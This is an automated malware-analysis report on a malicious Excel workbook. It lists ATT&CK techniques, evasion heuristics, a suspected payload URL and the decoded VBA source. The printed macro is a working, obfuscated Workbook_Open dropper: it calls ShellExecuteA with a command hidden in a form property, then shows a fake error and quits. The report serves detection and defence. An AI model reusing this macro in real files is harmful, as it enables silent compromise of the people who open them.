Verdict: MALICIOUS
Risk Score: 70
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
This Excel document contains a Workbook_Open VBA macro that is designed to execute a command. The macro utilizes the ShellExecuteA function, which is often used to download and execute a second-stage payload. The embedded URL was likely intended to host this payload.
Heuristics (4)
- VBA project inside OOXML (medium, 2 related findings, OOXML_VBA): Document contains a VBA project; VBA macros present (project part renamed away from vbaProject.bin: xl/dvdsvhufhuierhiu.txt).
- VBA project part renamed to evade filename detection (high, OOXML_VBA_PROJECT_RENAMED): The VBA project is bound through the OOXML relationship/content type, but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
- Workbook_Open macro (low, OLE_VBA_WBOPEN): Workbook_Open macro. Matched line in script: `#End If Sub wORKBooK_oPen(): Call mPvdt: End Sub Sub mPvdt()`
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: https://ntro.fr/gtrdek/officeclick.png (in document text: OOXML body / shared strings).
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2726 bytes | a7b4475fbe67a5aef18d3c4c2ca4d0049285cb2fe9f3d892247bd028255dce11 |

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Module1"
Sub bdbrx()
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
#If VBA7 Then
#If Win64 Then
Private Declare PtrSafe Function Gsbsz Lib "shell32" Alias "ShellExecuteA" (ByVal ynnoy As LongPtr, ByVal tWrsp As String, ByVal HOFhq As String, ByVal ubqIj As String, ByVal NKezf As String, ByVal tWrsp As LongPtr) As LongPtr
#Else
Private Declare PtrSafe Function Gsbsz Lib "shell32" Alias "ShellExecuteA" (ByVal ynnoy As Long, ByVal tWrsp As String, ByVal HOFhq As String, ByVal ubqIj As String, ByVal NKezf As String, ByVal tWrsp As Long) As Long
#End If
#Else
#If Win64 Then
Private Declare PtrSafe Function Gsbsz Lib "shell32" Alias "ShellExecuteA" (ByVal ynnoy As LongPtr, ByVal tWrsp As String, ByVal HOFhq As String, ByVal ubqIj As String, ByVal NKezf As String, ByVal tWrsp As LongPtr) As LongPtr
#Else
Private Declare Function Gsbsz Lib "shell32" Alias "ShellExecuteA" (ByVal ynnoy As Long, ByVal tWrsp As String, ByVal HOFhq As String, ByVal ubqIj As String, ByVal NKezf As String, ByVal tWrsp As Long) As Long
#End If
#End If
Sub wORKBooK_oPen(): Call mPvdt: End Sub
Sub mPvdt()
Call yVhgV
End Sub
Sub yVhgV()
Call wGLTT
End Sub
Static Sub wGLTT()
Call IMxWv
End Sub
Sub IMxWv()
Call USjZX
End Sub
Sub USjZX()
Call SDMLV
End Sub
Static Sub SDMLV()
Call eJzOx
End Sub
Sub eJzOx()
Call qPlRZ
End Sub
Sub qPlRZ()
Call CVXUA
End Sub
Static Sub CVXUA()
Call AGBHy
End Sub
Function AGBHy() As Variant
Call Gsbsz(0, "oPEn", Split(UserForm1.CheckBox1.GroupName, ChrW$(32))(0), Right(UserForm1.CheckBox1.GroupName, Len(UserForm1.CheckBox1.GroupName) - Len(Split(UserForm1.CheckBox1.GroupName, ChrW$(32))(0))), "", 1)
MsgBox ("The filename, directory name, or volume label syntax is incorrect.")
Application.Quit
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{8C3E8C44-A29C-418F-9ECA-FA230E799425}{013334C2-8723-4AC4-A94B-DFA180F51A91}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/dvdsvhufhuierhiu.txt | 25088 bytes | efb1e49a1ba9b09f97684e3e49dee70cce454c1cfbe08e38b10adb2e15641266 |